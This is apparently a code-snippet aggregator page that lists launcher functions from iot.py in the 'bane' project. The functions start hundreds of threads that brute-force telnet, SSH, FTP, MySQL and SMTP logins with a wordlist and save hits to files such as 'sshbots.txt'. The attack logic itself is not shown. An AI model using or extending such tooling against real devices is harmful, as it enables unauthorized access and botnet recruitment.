예제 #1
0
파일: iot.py 프로젝트: AlaBouali/bane
def IoTtelnet(threads=500,wl=wordlist,filename='telnetbots.txt'):
 create_file(filename)
 global filen
 filen=filename
 global wordlist
 wordlist=wl
 for x in range(threads):
  iott().start()
예제 #2
0
파일: iot.py 프로젝트: AlaBouali/bane
def IoTmysql2(threads=100,wl=wordlist,filename='mysqldefaultbots.txt'):
 create_file(filename)
 global filen
 filen=filename
 global wordlist
 wordlist=wl
 for x in range(threads):
  iotmy2().start()
예제 #3
0
def IoTmysql2(threads=100, wl=wordlist, filename='mysqldefaultbots.txt'):
    create_file(filename)
    global filen
    filen = filename
    global wordlist
    wordlist = wl
    for x in range(threads):
        iotmy2().start()
예제 #4
0
파일: iot.py 프로젝트: AlaBouali/bane
def IoTftp(threads=100,meth=1,wl=wordlist,filename='ftpbots.txt'):
 create_file(filename)
 global filen
 filen=filename
 global wordlist
 wordlist=wl
 for x in range(threads):
  iotf1().start()
예제 #5
0
def IoTftp(threads=100, meth=1, wl=wordlist, filename='ftpbots.txt'):
    create_file(filename)
    global filen
    filen = filename
    global wordlist
    wordlist = wl
    for x in range(threads):
        iotf1().start()
예제 #6
0
파일: iot.py 프로젝트: AlaBouali/bane
def IoTssh(threads=100,meth=1,wl=wordlist,filename='sshbots.txt'):
 create_file(filename)
 global filen
 filen=filename
 global method
 method=meth
 global wordlist
 wordlist=wl
 for x in range(threads):
  t=iots().start()
예제 #7
0
파일: iot.py 프로젝트: AlaBouali/bane
def IoTsmtp(o,threads=100,wl=wordlist,filename='smtpbots.txt'):
 create_file(filename)
 global filen
 filen=filename
 global octet
 octet=o
 global wordlist
 wordlist=wl
 for x in range(threads):
  iotsm().start()
예제 #8
0
def IoTssh(threads=100, meth=1, wl=wordlist, filename='sshbots.txt'):
    create_file(filename)
    global filen
    filen = filename
    global method
    method = meth
    global wordlist
    wordlist = wl
    for x in range(threads):
        t = iots().start()
예제 #9
0
def IoTsmtp(o, threads=100, wl=wordlist, filename='smtpbots.txt'):
    create_file(filename)
    global filen
    filen = filename
    global octet
    octet = o
    global wordlist
    wordlist = wl
    for x in range(threads):
        iotsm().start()
예제 #10
0
def IoTtelnet(threads=100, meth=1, wl=wordlist, filename='telnetbots.txt'):
    create_file(filename)
    global filen
    filen = filename
    global method
    method = meth
    global wordlist
    wordlist = wl
    for x in range(threads):
        iott().start()
예제 #11
0
파일: iot.py 프로젝트: AlaBouali/bane
def IoTftpanon(threads=100,filename='ftpanonbots.txt'):
 create_file(filename)
 global filen
 filen=filename
 for x in range(threads):
  iotf2().start()
예제 #12
0
def IoTftpanon(threads=100, filename='ftpanonbots.txt'):
    create_file(filename)
    global filen
    filen = filename
    for x in range(threads):
        iotf2().start()